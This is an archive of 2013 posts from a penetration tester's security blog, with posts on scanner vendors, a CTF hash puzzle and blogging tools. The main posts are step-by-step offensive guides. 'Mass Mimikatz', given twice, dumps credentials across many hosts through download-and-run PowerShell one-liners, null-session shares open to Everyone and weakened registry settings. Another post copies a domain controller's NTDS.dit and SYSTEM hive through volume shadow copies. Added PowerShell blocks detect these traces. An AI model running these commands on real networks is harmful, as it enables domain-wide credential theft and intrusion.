
Tuesday, October 15, 2013

Open Letter to Vulnerability Scanner Companies

Dear @NeXpose, @Qualys, @Nessus and the rest of you…

As listed here: Vulnerability Scanning Tools

(I hope some of you are already doing this and I just haven’t seen your tools yet)

As penetration testers / red teamers, our deliverables are, at worst, a long-winded list of vulnerabilities or a printout from one of your tools; at best, they are a narrative that helps anyone reading it understand the impact of what was found and how it was found.

These vulnerabilities can range from “YOU ALLOW OPENSSL 1.0!! OMG” to “There is an implementation-specific 0day vulnerability in your Widgets Inc. application”. It takes us a very long time to write these things up, and they usually end up in a PDF or Word document, neither of which is easy to parse, automate, or in all honesty do anything with at all. Some of the better pentest groups / companies have web apps where customers can log in to see their vulnerabilities, or Excel documents with findings. This is a painful process.

How you can help and why you care:

All of you have gone web-accessible. If you were to create an interface for “Pentesters” or “Security Auditors” or “Red Teamers” (call it what you will), an account level that would allow us to log in and directly input our “findings” into a company’s ALREADY CONFIGURED vulnerability management solution (YOU), you would make our lives easier, as well as your customers’.

The things that would be needed in this interface:
  • Custom vulnerability creation with ability to fill out fields with respect to references, suggested remediation, suspected impact level, screen shots, and attack detection capabilities (the list goes on)
  • No access to other scanner results; we’re pentesters, and if we can cheat we will ;-) (but make it optional to turn on)
  • Last (year|month|century)’s “pentest” findings. These can be used as “ya we already know about those and are fixing them” or “please make sure they were all fixed”
  • During input use AJAX or whatever funky tech you use to auto-suggest vulnerability IDs or things that you already have in the database. It would save our typing and make it much easier to track for your customers.
  • Make it a timed access period with an automatic password change, since a company would be giving a tester access to the system it scans from. The “cheat” factor could be curtailed here.
  • If you are a non-hosted product, make the interface something I don’t have to punch holes in my firewall to make happen (unless I want to).
  • Ability to input other vendor vulnerability scanning or pentesting (Impact/MSF Pro/CANVAS) exports.
Benefits to pentesters:
  • The report out would be more of a highlights reel + executive summary versus a list of vulnerabilities
  • Inputting findings during the test, with a screenshot upload and specific fields, is much easier than trying to keep track of findings and then writing long reports where 80% of your time is spent on word processor formatting problems
  • If a finding is a known quantity, use the information already a part of the vulnerability scanner, instead of having to keep a collection of 300+ template findings or having to write new ones
Benefits to the customer:
  • The ability to easily come back 2,3,6 months later and re-check any findings/vulnerabilities by clicking a button if the finding was related to a vulnerability ID
  • No need to convert / translate pentester speak into a finding.
  • Easy tracking from reporting to fix
  • Easy scaling. Pentester reports Default Creds on Tomcat server with vuln ID 999, scanner automagically says this vuln is also on these other 40 servers.
I’m sure there are a bunch of other things that can make an interface like this WIN-WIN-WIN that I can’t think of right now.

Making money on the idea:
  1. Companies could then start requesting “NeXpose Certified Pentesters” or a “Nessus Certified” pentest company, which would involve your company training those testers to use your interface.
  2. You could sell deployable “appliances” so that the testers can interface with the internal asset without having access inside the firewall. (Basically, the internal scanner pulls down the “findings” data from an Internet-accessible “appliance” that gets destroyed (un-deployed) at the end of the test.)
All of this would result in a more unified way for testers to report findings, make it easier for the people who consume those findings to act on them (make tickets, deploy and track the remediation efforts), and make you a few dollars along the way.

Thanks for your time,
mubix

Update: Just to clarify a few things discussed on twitter already:
  1. The certification isn’t that a tester is an uber-hacker; it’s basically for a company to say “You know how to use our findings/vuln management tool without breaking it”. Think of it less like a CISSP/OSCP and more like a check box, and a small give on the “integrity of uber pentesters” to get a greater good done.
  2. This suggestion isn’t a different way to export scanner findings. It’s a way for testers to input their findings in an easy-to-manage format that the company’s employees already know how to deal with.
  3. This is meant to be a small addition to the existing infrastructure of an organization, not yet another piece of software that both the company employees and the testers have to learn and support on their infrastructure. Minimal impact to current functionality and use is key.

Tuesday, October 08, 2013

Outlook Cached Attachments

I happened upon an interesting directory today that I didn’t know about:

%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\

In that directory was what looked to be a randomly generated 8-character directory (e.g. A821ZSQI), which held a bunch of attachments from my email (not just my inbox).

According to Microsoft KB 817878 this is a “Secure” temp folder, which can be identified by a handy dandy registry key (Outlook 2010 referenced; the KB has the others):

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security

I tested this out with an email that was encrypted. Once the file was opened it landed in the temp directory and stayed there after I closed the email and Outlook.

This is definitely going on the top of my Post-Exploitation click scripts.
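For the same reason the folder matters to a tester, it matters to whoever cleans up after an incident or prepares a machine for handover. The following PowerShell is an added example, not from the post: it reads the folder path from the registry key named above (the value name OutlookSecureTempFolder is Microsoft's; the post only names the key), falls back to the Content.Outlook path, lists what is left behind and can clear it. The 14.0 version is assumed as in the post; pass -OfficeVersion for other releases.

```powershell
# Added example (not from the original post): locate Outlook's "secure temp folder"
# and list or clear the attachments it left behind. Assumes Outlook 2010 (14.0).
function Get-OutlookSecureTempFolder {
    param([string]$OfficeVersion = '14.0')
    $key = "HKCU:\Software\Microsoft\Office\$OfficeVersion\Outlook\Security"
    # OutlookSecureTempFolder (REG_SZ) holds the full path of the random 8-character folder.
    $path = (Get-ItemProperty -Path $key -Name OutlookSecureTempFolder -ErrorAction SilentlyContinue).OutlookSecureTempFolder
    if (-not $path) {
        # Fallback: the Content.Outlook parent named in the post; the random subfolder sits below it.
        $parent = Join-Path $env:USERPROFILE 'AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook'
        $path = Get-ChildItem -Path $parent -Directory -Force -ErrorAction SilentlyContinue |
                Select-Object -First 1 -ExpandProperty FullName
    }
    return $path
}

function Get-OutlookCachedAttachments {
    param([string]$Folder = (Get-OutlookSecureTempFolder))
    if (-not $Folder -or -not (Test-Path -LiteralPath $Folder)) { return @() }
    # -Force includes hidden/system entries; Outlook marks nothing here, but the parent is a system folder.
    Get-ChildItem -LiteralPath $Folder -File -Recurse -Force |
        Select-Object FullName, Length, LastWriteTime
}

function Clear-OutlookCachedAttachments {
    param([string]$Folder = (Get-OutlookSecureTempFolder))
    # Refuse to delete under a running Outlook: an attachment open in a viewer lives here.
    if (Get-Process -Name OUTLOOK -ErrorAction SilentlyContinue) {
        Write-Warning 'Outlook is running; close it before clearing the cache.'
        return
    }
    Get-OutlookCachedAttachments -Folder $Folder | ForEach-Object {
        Remove-Item -LiteralPath $_.FullName -Force
    }
}

# Report newest leftovers first; call Clear-OutlookCachedAttachments to remove them.
Get-OutlookCachedAttachments | Sort-Object LastWriteTime -Descending | Format-Table -AutoSize
```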



Sunday, October 06, 2013

Dumping a Domain Worth of Passwords With Mimikatz

clymb3r recently posted a script called “Invoke-Mimikatz.ps1”. Basically, what this does is reflectively inject mimikatz into memory, call for all the logonPasswords and exit. It even checks the target’s architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

(This works REALLY well for Citrix and kiosk scenarios, and it isn’t too hard to type/remember.) This runs the PowerShell script by pulling it directly from GitHub and executing it “in memory” on your system.

One of the awesome added capabilities of this script is to run on a list of hosts, as so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"

This works great, as all the output lands directly on your system and everything is executed through PowerShell Remoting. PowerShell Remoting is pretty much the same as WinRM. This service, however, is not enabled by default, and it can be pretty hit or miss how much any given enterprise uses WinRM. It is usually the servers and more important systems that have it enabled, more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn’t a WinRM-rich environment, or you just want more passwords, you can take a slightly more painful route. I call it “Mass Mimikatz”.

Step 1. 

Make a share. We are doing this not only so we can collect the password output from all our computers, but also to host the CMD batch file that will run the PowerShell script:

cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t

We are setting “Everyone” permissions at both the share (net share) and NTFS (icacls) level for this to work properly.

Step 2.

Set registry keys. There are two registry values that we need to set. The first allows null sessions to our new share and the second gives null users the “Everyone” token so that we don’t have to get crazy with our permissions. I have created a Meterpreter script with a bunch of error checking here: massmimi_reg.rb, or you can just make the following changes:

HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters  NullSessionShares (REG_MULTI_SZ) = open
HKLM\System\CurrentControlSet\Control\Lsa  EveryoneIncludesAnonymous = 1

Step 3.

Change directory into the new “open” directory. This is so our uploads, and in particular our web server, are hosted out of the correct directory.

Step 4.

Upload the batch file powermeup.cmd – this script will run our hosted Invoke-Mimikatz script on each host:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1"

Step 5.

Upload clymb3r’s Invoke-Mimikatz.ps1 – download it from the PowerSploit repo: source on github

Step 6.

Upload mongoose: Downloads Page – both the regular and tiny versions work. This is an awesome single-executable web server that supports Lua, SQLite, and WebDAV out of the box. The tiny version is under 100k.

Step 7.

Upload serverlist.txt – this is a line-by-line list of computer names to run mimikatz on. You’ll have to gather this one way or another.

Step 8.

Execute mongoose (from the directory with the mimikatz .ps1) – this will start a listener with directory listings enabled on port 8080 by default.

Step 9a.

Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

Step 9b.

Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

Step 10.

Watch as text files full of wonder and joy fill your share.

You can find the scripts here: https://github.com/mubix/post-exploitation/tree/master/scripts/mass_mimikatz

Don’t forget to clean up:

  1. kill mongoose process
  2. net share open /delete
  3. kill/reset registry values
  4. delete “open” directory

Got a better way of getting this done? Please leave a comment.

P.S. You could just enable Powershell Remoting for them ;)

psexec @serverlist.txt -u [admin account name] -p [admin account password] -h -d powershell.exe "enable-psremoting -force"

"Passwords, here, here, here, EVERYWHERE!"
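Every setup step above leaves something a defender can look for, and the cleanup list is exactly what should be absent afterwards. The PowerShell below is an added example, not part of this post or the shorter Mass Mimikatz write-up further down: it checks a host for populated NullSessionShares, EveryoneIncludesAnonymous set to 1, shares whose ACL allows Everyone, and recent process-creation events carrying the IEX/DownloadString one-liner. It assumes only the registry values and share setup the post itself describes; the Get-Smb* cmdlets exist on Windows 8 / Server 2012 and newer, and event 4688 only carries command lines when command-line auditing is enabled.

```powershell
# Added example (not from the original post): audit a host for the footprints the
# "Mass Mimikatz" setup leaves behind, or confirm the post's cleanup steps were done.
function Test-NullSessionExposure {
    $srv = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $findings = @()

    # NullSessionShares (REG_MULTI_SZ): every entry is reachable over anonymous SMB.
    $nullShares = (Get-ItemProperty -Path $srv -Name NullSessionShares -ErrorAction SilentlyContinue).NullSessionShares
    foreach ($s in @($nullShares) | Where-Object { $_ }) {
        $findings += [pscustomobject]@{ Check = 'NullSessionShares'; Detail = $s }
    }

    # EveryoneIncludesAnonymous = 1 puts the Everyone SID into anonymous tokens (default is 0).
    $eia = (Get-ItemProperty -Path $lsa -Name EveryoneIncludesAnonymous -ErrorAction SilentlyContinue).EveryoneIncludesAnonymous
    if ($eia -eq 1) {
        $findings += [pscustomobject]@{ Check = 'EveryoneIncludesAnonymous'; Detail = 'set to 1' }
    }

    # Non-administrative shares whose share-level ACL allows Everyone.
    if (Get-Command Get-SmbShareAccess -ErrorAction SilentlyContinue) {
        foreach ($share in Get-SmbShare | Where-Object { -not $_.Special }) {
            $grants = Get-SmbShareAccess -Name $share.Name |
                Where-Object { $_.AccountName -eq 'Everyone' -and $_.AccessControlType -eq 'Allow' }
            foreach ($g in $grants) {
                $findings += [pscustomobject]@{
                    Check  = 'ShareAllowsEveryone'
                    Detail = "$($share.Name) -> $($share.Path) ($($g.AccessRight))"
                }
            }
        }
    }
    return $findings
}

function Find-DownloadCradleEvents {
    # Security 4688 events whose command line contains the download-and-run pattern.
    # Launched via wmic, the parent process on the target is WmiPrvSE.exe.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '(?i)DownloadString' -and $_.Message -match '(?i)\bIEX\b|Invoke-Expression' } |
        ForEach-Object {
            $cmd = ($_.Message -split "`r?`n" | Where-Object { $_ -match '^\s*Process Command Line:' }) -replace '^\s*Process Command Line:\s*', ''
            [pscustomobject]@{ Time = $_.TimeCreated; CommandLine = $cmd }
        }
}

Test-NullSessionExposure | Format-Table -AutoSize
Find-DownloadCradleEvents | Format-Table -AutoSize -Wrap
```

An empty result from Test-NullSessionExposure after the test is the quickest confirmation that steps 2 and 4 of the cleanup list actually happened.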


Saturday, October 05, 2013

Vanilla Cake #DerbyCake 2013 Solution

One of the most contested parts of the #DerbyCake contest was the hint on the Vanilla cake. It was just a long string of 1s and 0s. The hint that I kept telling everyone is that the “binary is binary” and I meant it. You weren’t supposed to hash or do anything special with it.

The reason this particular challenge is in the contest is that I run into this scenario a lot. Many times when I access binary password fields, in either the Windows registry or in database servers, the data comes out as 1s and 0s or some other binary format, and I have to convert it back into its original hash format.

The solution therefore is pretty straightforward. You start with your very long binary string (I’m using Ruby, but it’s pretty much the same in Python or any other language):

cakestring = '01111101011110101110111111100110101110010001000111010101010110010000100110100010011011110110010001111110101010101010111110100111000111101101001011010010001100011110101100100110101011011011001110100001010110100100101000100010100111110011100001000110100101101100101010110011011000100010001110111100011011100001011011100001111111000110101111110111101111011101110001000100010010001001001010001100101010100000000111000000100110001100011011100010010101001110000011100001100000010111111100100000011101100100011001110101'

Then you “pack” the binary into a string format:

reverse1 = [cakestring].pack("b*")   # "b*": read the bits least-significant bit first, 8 per byte

And finally into the hex format of the SHA512 hash (most people got that it was a SHA512 hash due to the 512 bits):

puts "Hash: #{reverse1.unpack("H*").first}"   # unpack returns a one-element array; .first gives the hex string

That easy. The result is an easily cracked SHA512 hash (that is, if you got all the hints in the DerbyCon presenters’ slides):

Hash: be5ef7679d88ab9a9045f6267e55f5e5784b4b8cd764b5cd855a5244f91c626953cd46c43d7668873fd6efbd3b221249315580031963472a078781fe046e62ae
Password: correct horse battery staple

Here is how you would generate such a challenge if you were so inclined:

#!/usr/bin/env ruby
require 'digest/sha2'

password = "correct horse battery staple"
puts "Password: #{password}"
forwards1 = Digest::SHA512.hexdigest(password)
puts "Hash: #{forwards1}"

# Turn the hex digest back into its 64 raw bytes, two hex characters at a time
forwards2 = forwards1.scan(/../)
forwards3 = []
forwards2.each do |f2|
    forwards3 << f2.hex.chr
end
forwards4 = forwards3.join

# "b*" emits each byte's bits least-significant bit first (the same order the
# solution above packs with); .first pulls the string out of the array unpack returns
puts "Binary: #{forwards4.unpack("b*").first}"

You can find a write up of the rest of the challenges and hints over on Ryan Fenno’s blog here: http://slae412.wordpress.com/2013/10/04/derbycake-2013-write-up/

Sorry to everyone who beat their head upside the wall for hours on this one. I was actually expecting this to be the first challenge to fall.

Friday, October 04, 2013

Mass Mimikatz

1. Make Share:

cd\

mkdir open

net share open=C:\open /grant:everyone,full

icacls C:\open\ /grant Everyone:(OI)(CI)F /t

2. Set registry keys (massmimi_reg.rb meterpreter script):

Registry change: HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters  NullSessionShares (REG_MULTI_SZ) = open

Registry change: HKLM\System\CurrentControlSet\Control\Lsa  EveryoneIncludesAnonymous = 1

3. Change directory into new “open” directory

4. Upload powershell script (powermeup.cmd):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1"

5. Upload clymb3r’s Invoke-Mimikatz.ps1 - Download from PowerSploit repo: source on github

6. Upload mongoose: Downloads Page (Updated to use Archive.org version) - Both regular and tiny versions work

7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on.

8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

9. Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

9a. Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

Clean up:
1. kill mongoose process
2. net share open /delete
3. kill registry values
4. delete “open” directory

Tuesday, September 17, 2013

Blogging Requirements

So I’ve been trying out blogging software and platforms up and down the Internet streets, and I really haven’t found one that works really well (IMHO).

Until @daanraman suggested Roon.io, which I hadn’t heard of yet. I have to admit, it has probably one of the best-designed interfaces I’ve seen. I don’t need micromanaging control over a blog. I have pretty basic needs, actually.
  1. I have to be able to blog from where I want to blog. Oddly enough, this is where most newer blogging platforms fall down. Your amazing JavaScript editor that took you 500 hours to get right is just something I’m not going to use all that often. It’s pretty rare for me to want to blog inside of a browser, actually. I usually have 100 tabs open and your stupid editor is often lost in the mix. It’s just nice to have something separate that I can pull things from those 100 browser tabs into without having to find the editor tab again. (Yes, I realize I can pull out another window, but then the editors usually don’t fit.)
  2. I post code snippets, directory listings and a ton of other things that I don’t want officially rendered. This is probably not a common problem among bloggers, but I can’t count how many times and platforms can’t get a simple Windows directory listing to display correctly without me trying to figure out what code finagling I have to do to get the blogging platform to display it the way I need it to. I will use whatever syntax is needed; I just can’t be expected to remember every undocumented workaround to get an HTML tag to display without rendering.
  3. This is a bit of #1, but I need to be able to blog with ease. If it takes me 40 minutes just to get formatting correct or to fix blogging software to blogging platform incompatibility issues, I’m just going to stop trying. Or if it takes me 10 minutes of git update, git push etc. to add a new post, it just isn’t worth it. (I realize you can script Octopress up, but then you’ll have it scripted up in one location/computer, which goes against #1.)
  4. I really don’t care how many templates or formats you have, as long as one is actually readable. I know most customers/bloggers want their ads, and support, and logos and stuff everywhere. I’m not them. If the reader has an easy time reading my content, I’m happy.
  5. I will pay for these conveniences. I’ve been paying SquareSpace for close to 4 years now, about $20 per month. I actually don’t want my blogging service to be free. The reason for this is that free == I’m the product. I don’t want ads to one day creep into my site because the developer of the blogging platform needs money to live on. I would rather pay them directly. The other thing that “free” breeds is direction inflicted by the one paying the bills. I use the word “inflicted” quite specifically, since I have seen some blogging platforms go down the tubes because their VC had some “brilliant” ideas. I’d pay fair pay for fair service.
  6. A developer/team/support who listen. I don’t care if they say “sorry, not something we are looking at doing”; that’s fair, it’s their software, not mine, and I’m a big boy, I can move on if it’s something I care about. But honestly, I have no idea why most applications don’t have a ‘vote for a feature’ option/service, or at the very least “feature request” buttons.
  7. Hosted. I’m very much done trying to protect and secure a platform or OS that my blog is hosted on. I’d rather spend my time on other things, like, you know, generating content.
Anywho, that’s my rant on what I’d love to see in a blogging platform. I promised someone I would write it up, so here it is.

Thursday, June 20, 2013

Volume Shadow Copy NTDS.dit Domain Hashes Remotely - Part 1


This and part 2 are mostly just an update to http://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/ , but without the need for VSSOwn, and we are doing it remotely without needing a shell on the DC.
Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV, and GPOs not allowing anyone to RDP in (even Domain Admins) unless they provided some kind of voodoo happy dance? Yeah, me neither, but here is how you can still dump domain hashes and hash history if you run into that case. Let’s start.

First authenticate to the domain controller and make sure you have a good working directory to use.

net use \\DC1 /user:DOMAIN\domainadminsvc domainadminsvc123
dir \\DC1\C$

Alright, let’s say “TEMP” is there and it’s empty on the remote DC. The way we are going to run commands will not let us get results directly, so we are going to use a temp file on the DC in C:\TEMP, which we already made sure is clear.

We are going to be using Volume Shadow Copies to pull the NTDS.dit file (Active Directory’s DB, much like Windows’ SAM file except that it stores the entire set of AD objects); we also need the SYSTEM registry hive. You can grab the SAM registry hive as well, but that will only get you local DC credentials.

So let’s list the current volume shadow copies to see if we need to create one, from a Windows command prompt (or, if you’ve installed wmic for Linux via http://www.krenger.ch/blog/wmi-commands-from-linux/ ) – this IS an interactive command, so it won’t work very nicely in a Meterpreter shell:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows > C:\temp\output.txt 2>&1"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 7304;
        ReturnValue = 0;
};

To break down this command:

  • wmic /node:DC1 – tells it to interact with the WMI API on DC1
  • /user:DOMAIN\domainadminsvc /password:domainadminsvc123 – authentication
  • process call create – WMI speak for create a process
  • cmd /c – vssadmin doesn’t operate outside of cmd for some reason…
  • vssadmin list shadows – List any shadow volumes that already exist
  • > C:\temp\output.txt 2>&1 – Send STDOUT and STDERR to a text file in C:\TEMP on DC1 (the file redirect has to come first; the other way round, cmd sends STDERR to the original console before redirecting STDOUT, so errors never reach the file). Make sure you specify the full path, because you will be executing from within C:\Windows\System32 and it’s a pain to find anything in that directory. So if you just specify > bob.txt you get to hunt in C:\Windows\System32, or wherever WMI wants to execute you from, for bob.txt.

The process starts, and then you need to view the output file by either copying it down, running type \\DC1\C$\TEMP\output.txt, or mounting the C drive as a network share. Either way you should see something like this:

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {671090fd-0198}
   Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
      Shadow Copy ID: {0863e309}
         Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: wpad
         Service Machine: wpad
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

or

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

No items found that satisfy the query

If there are no shadow copies, or the ones there are too old (look at the creation time), you can create a shadow copy using the ‘vssadmin create shadow /for=C:’ command. (This command only applies to Server OSes (Win2k3/Win2k8), but since those are the only two that commonly have NTDS.dit files we don’t have to remember this):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin create shadow /for=C: > C:\temp\output.txt 2>&1"

The other thing to keep in mind is that NTDS.dit isn’t always on the main drive. It is commonly on a “D” drive for safety in case a HDD goes bad or something. But it should always be in a folder called NTDS. (By default this is C:\Windows\NTDS.)

Next we just copy the files out of the shadow copies. First the SYSTEM hive:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive > C:\temp\output.txt 2>&1"

Then the NTDS.dit (notice this one isn’t in System32):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit > C:\temp\output.txt 2>&1"

In Kali Linux you could use the WMIS package to do much the same thing:

root@kali:~# wmis -U 'DOMAIN\domainadminsvc%domainadminsvc123' //DC1 'cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit > C:\temp\output.txt 2>&1'
NTSTATUS: NT_STATUS_OK - Success

Copy those files to your own system for offline extraction which I’ll cover in part 2.
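Everything above is also visible from the DC's side: the shadow copy itself, the WMI-spawned processes that read it, and the staged copies in C:\temp. The PowerShell below is an added example, not from the post or from the securityweekly write-up it updates: run on the DC, it lists shadow copies with their creation time, pulls Security 4688 events that touch a shadow copy device path, vssadmin, NTDS.dit or the SYSTEM hive, and looks for staged copies in the usual temp locations. It assumes command-line auditing is on (otherwise 4688 carries no command line) and that the Creator Process Name field exists (Windows 10 / Server 2016 and newer).

```powershell
# Added example (not from the original post): audit a domain controller for the
# artefacts the remote shadow-copy technique leaves behind. Run it on the DC itself.
function Get-ShadowCopyInventory {
    # Same data vssadmin list shadows prints, as objects; InstallDate shows how fresh each copy is.
    Get-CimInstance -ClassName Win32_ShadowCopy |
        Select-Object ID, InstallDate, VolumeName, DeviceObject, OriginatingMachine, ClientAccessible
}

function Find-ShadowCopyAccessEvents {
    # Security 4688 events whose command line reads a shadow copy by device path,
    # drives vssadmin, or names NTDS.dit / the SYSTEM hive directly.
    param([int]$Hours = 24)
    $pattern = '(?i)HarddiskVolumeShadowCopy|vssadmin\s+(create|list)\s+shadow|\\NTDS\\NTDS\.dit|\\config\\SYSTEM\b'
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $pattern } |
        ForEach-Object {
            $lines = $_.Message -split "`r?`n"
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Process     = ($lines | Where-Object { $_ -match '^\s*New Process Name:' }) -replace '^\s*New Process Name:\s*', ''
                # Remote wmic / wmis launches show WmiPrvSE.exe here.
                Parent      = ($lines | Where-Object { $_ -match '^\s*Creator Process Name:' }) -replace '^\s*Creator Process Name:\s*', ''
                CommandLine = ($lines | Where-Object { $_ -match '^\s*Process Command Line:' }) -replace '^\s*Process Command Line:\s*', ''
            }
        }
}

function Find-StagedDirectoryFiles {
    # NTDS.dit or a *.hive file outside the live NTDS / config folders is a staging artefact
    # (the post writes SYSTEM.hive and NTDS.dit to C:\temp before copying them off).
    param([string[]]$Roots = @('C:\temp', 'C:\Windows\Temp', $env:TEMP))
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -Force -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -ieq 'ntds.dit' -or $_.Name -ilike '*.hive' } |
            Select-Object FullName, Length, LastWriteTime
    }
}

Get-ShadowCopyInventory | Format-Table -AutoSize
Find-ShadowCopyAccessEvents | Format-Table -AutoSize -Wrap
Find-StagedDirectoryFiles | Format-Table -AutoSize
```

A shadow copy with an InstallDate minutes old on a DC that has no backup job scheduled for that time is the single most telling line this prints.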